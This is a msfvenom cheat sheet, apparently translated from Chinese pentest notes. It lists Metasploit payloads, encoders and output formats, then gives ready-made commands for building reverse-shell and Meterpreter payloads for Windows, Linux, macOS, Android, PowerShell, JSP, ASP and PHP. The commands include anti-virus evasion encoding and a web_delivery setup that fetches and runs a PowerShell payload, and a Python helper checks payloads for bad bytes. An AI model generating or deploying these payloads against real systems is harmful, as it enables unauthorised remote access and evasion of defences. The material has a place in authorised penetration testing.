msfvenom
msfvenom can generate payloads for bind or reverse shells; paired with meterpreter it is very convenient for penetration testing, although in real-world use the payload still needs appropriate anti-virus evasion handling.
-l, --list
Syntax:
payloads
There are a great many, so they are not all listed here; the output below is a sample.
Framework Payloads (546 total) [--payload <value>]
==================================================
Name Description
---- -----------
windows/x64/meterpreter_bind_named_pipe
windows/x64/meterpreter_bind_tcp
windows/x64/meterpreter_reverse_http
windows/x64/meterpreter_reverse_https
windows/x64/meterpreter_reverse_ipv6_tcp
windows/x64/meterpreter_reverse_tcp
windows/x64/powershell_bind_tcp
windows/x64/powershell_reverse_tcp
encoders
Framework Encoders [--encoder <value>]
======================================
Name Rank Description
---- ---- -----------
cmd/brace low Bash Brace Expansion Command Encoder
cmd/echo good Echo Command Encoder
cmd/generic_sh manual Generic Shell Variable Substitution Command Encoder
cmd/ifs low Bourne ${IFS} Substitution Command Encoder
cmd/perl normal Perl Command Encoder
cmd/powershell_base64 excellent Powershell Base64 Command Encoder
cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder
generic/eicar manual The EICAR Encoder
generic/none normal The "none" Encoder
mipsbe/byte_xori normal Byte XORi Encoder
mipsbe/longxor normal XOR Encoder
mipsle/byte_xori normal Byte XORi Encoder
mipsle/longxor normal XOR Encoder
php/base64 great PHP Base64 Encoder
ppc/longxor normal PPC LongXOR Encoder
ppc/longxor_tag normal PPC LongXOR Encoder
ruby/base64 great Ruby Base64 Encoder
sparc/longxor_tag normal SPARC DWORD XOR Encoder
x64/xor normal XOR Encoder
x64/xor_dynamic normal Dynamic key XOR Encoder
x64/zutto_dekiru manual Zutto Dekiru
x86/add_sub manual Add/Sub Encoder
x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_underscore_tolower manual Avoid underscore/tolower
x86/avoid_utf8_tolower manual Avoid UTF8/tolower
x86/bloxor manual BloXor - A Metamorphic Block Based XOR Encoder
x86/bmp_polyglot manual BMP Polyglot
x86/call4_dword_xor normal Call+4 Dword XOR Encoder
x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder
x86/context_stat manual stat(2)-based Context Keyed Payload Encoder
x86/context_time manual time(2)-based Context Keyed Payload Encoder
x86/countdown normal Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder
x86/nonalpha low Non-Alpha Encoder
x86/nonupper low Non-Upper Encoder
x86/opt_sub manual Sub Encoder (optimised)
x86/service manual Register Service
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit manual Single Static Bit
x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder
x86/xor_dynamic normal Dynamic key XOR Encoder
nops
Framework NOPs (10 total)
=========================
Name Description
---- -----------
aarch64/simple Simple NOP generator
armle/simple Simple NOP generator
mipsbe/better Better NOP generator
php/generic Generates harmless padding for PHP scripts
ppc/simple Simple NOP generator
sparc/random SPARC NOP generator
tty/generic Generates harmless padding for TTY input
x64/simple An x64 single/multi byte NOP instruction generator.
x86/opty2 Opty2 multi-byte NOP generator
x86/single_byte Single-byte NOP generator
platforms
Framework Platforms [--platform <value>]
========================================
Name
----
aix
android
apple_ios
bsd
bsdi
cisco
firefox
freebsd
hardware
hpux
irix
java
javascript
juniper
linux
mainframe
multi
netbsd
netware
nodejs
openbsd
osx
php
python
r
ruby
solaris
unifi
unix
unknown
windows
archs
Framework Architectures [--arch <value>]
========================================
Name
----
aarch64
armbe
armle
cbea
cbea64
cmd
dalvik
firefox
java
mips
mips64
mips64le
mipsbe
mipsle
nodejs
php
ppc
ppc64
ppc64le
ppce500v2
python
r
ruby
sparc
sparc64
tty
x64
x86
x86_64
zarch
encrypt
Framework Encryption Formats [--encrypt <value>]
================================================
Name
----
aes256
base64
rc4
xor
formats
Framework Executable Formats [--format <value>]
===============================================
Name
----
asp
aspx
aspx-exe
axis2
dll
elf
elf-so
exe
exe-only
exe-service
exe-small
hta-psh
jar
jsp
loop-vbs
macho
msi
msi-nouac
osx-app
psh
psh-cmd
psh-net
psh-reflection
vba
vba-exe
vba-psh
vbs
war
Framework Transform Formats [--format <value>]
==============================================
Name
----
bash
c
csharp
dw
dword
hex
java
js_be
js_le
num
perl
pl
powershell
ps1
py
python
raw
rb
ruby
sh
vbapplication
vbscript
-o, --out
Save the payload to the specified file
-b, --bad-chars
Specify the bad characters to avoid, e.g. \x00\xff
-i, --iterations
Specify the number of encoding iterations
-s, --space
Specify the maximum size of the payload
-k, --keep
The payload is split off automatically and injected into a new process
-c, --add-code
Specify an additional win32 shellcode file
-x, --template
Specify an executable file to use as a template
--smallest
Generate the smallest possible file
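The -b and -s options above express constraints that come from the target context (bytes the delivery path cannot carry, a buffer size the payload must fit), and an encoder with -i iterations is only useful if the result actually satisfies them. The following is an added example, not part of the original notes and not Metasploit code: it parses the same \xNN bad-character syntax msfvenom accepts, scans a raw (-f raw) output file for any forbidden byte, and checks the size against the -s limit. The sample bytes in SAMPLE_PAYLOAD are constructed for the demonstration and are not real msfvenom output.

```python
import re
import sys
from typing import Dict, List, Optional, Tuple

# Constructed sample bytes for the demonstration (assumption: not real msfvenom
# output); they contain a few bytes that the -b spec below forbids.
SAMPLE_PAYLOAD = b"\x90\x90\x31\xc0\x00\x41\x0a\xff\x42"


def parse_bad_chars(spec: str) -> bytes:
    r"""Parse the -b argument syntax msfvenom accepts, e.g. '\x00\x0a\xff'.

    Each \xNN escape becomes one forbidden byte value.
    """
    hexes = re.findall(r"\\x([0-9a-fA-F]{2})", spec)
    if not hexes:
        raise ValueError(f"no \\xNN escapes found in bad-char spec {spec!r}")
    return bytes(int(h, 16) for h in hexes)


def find_bad_chars(payload: bytes, bad: bytes) -> List[Tuple[int, int]]:
    """Return (offset, byte) for every forbidden byte present in the payload."""
    forbidden = set(bad)
    return [(off, b) for off, b in enumerate(payload) if b in forbidden]


def check_payload(payload: bytes, bad_spec: str,
                  max_size: Optional[int] = None) -> Dict[str, object]:
    """Apply both constraints: no forbidden bytes, and size within max_size
    (the -s limit) when one is given."""
    hits = find_bad_chars(payload, parse_bad_chars(bad_spec))
    fits = max_size is None or len(payload) <= max_size
    return {"size": len(payload), "hits": hits, "fits": fits,
            "ok": not hits and fits}


if __name__ == "__main__":
    # Usage: python check_payload.py <raw payload file> <bad-char spec> [max size]
    # With no arguments the constructed sample is checked instead.
    if len(sys.argv) >= 3:
        with open(sys.argv[1], "rb") as fh:
            data = fh.read()
        limit = int(sys.argv[3]) if len(sys.argv) > 3 else None
        result = check_payload(data, sys.argv[2], limit)
    else:
        result = check_payload(SAMPLE_PAYLOAD, r"\x00\x0a\xff", max_size=8)
    print(f"size={result['size']} fits_limit={result['fits']}")
    for off, b in result["hits"]:
        print(f"  forbidden byte 0x{b:02x} at offset {off}")
    print("OK" if result["ok"] else "FAILED")
```

The check only makes sense on -f raw output: for exe, elf or other wrapped formats the file contains the loader or template as well, and the -b constraint applies to the encoded shellcode inside it rather than to the whole file.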
Common payload generation
windows
- x86
msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe
- x64
msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x64/xor -i 3 -f exe -o payload.exe
linux
- 32
msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f elf -o payload.elf
- 64
msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=攻击机 LPORT=攻击机端口 -f elf -o payload.elf
mac
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f macho -o payload.macho
android
// needs to be signed
msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f apk -o payload.apk
powershell
There is no meterpreter version of this payload
cmd/windows/powershell_bind_tcp
cmd/windows/powershell_reverse_tcp
cmd/windows/reverse_powershell
windows/powershell_bind_tcp
windows/powershell_reverse_tcp
windows/x64/powershell_bind_tcp
windows/x64/powershell_reverse_tcp
msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1
msfvenom cannot generate a meterpreter version of the PowerShell reverse shell, so a different approach is used here: having msf directly generate the meterpreter reverse-shell script:
msf5 > use exploit/multi/script/web_delivery
msf5 exploit(multi/script/web_delivery) > set LHOST 攻击机IP
msf5 exploit(multi/script/web_delivery) > set LPORT 攻击机端口
msf5 exploit(multi/script/web_delivery) > set target 2
The available targets here are:
Exploit targets:
Id Name
-- ----
0 Python
1 PHP
2 PSH
3 Regsvr32
4 PSH (Binary)
Best choice: 2 - PSH
Second choice: 3 - Regsvr32 (though the resulting shell may not have sufficient privileges)
jsp
JSP supports only two payloads, neither with a meterpreter version
msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.jsp
asp/aspx
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f aspx -o payload.aspx
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f asp -o payload.asp
php
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
war
No meterpreter version
nodejs
No meterpreter version
python
perl
No meterpreter version
ruby
No meterpreter version
lua
windows shellcode
The generated shellcode needs to be compiled manually
linux shellcode
mac shellcode
Convenience payload generators
Project URL: https://github.com/Screetsec/TheFatRat.git
Project URL: https://github.com/Veil-Framework/Veil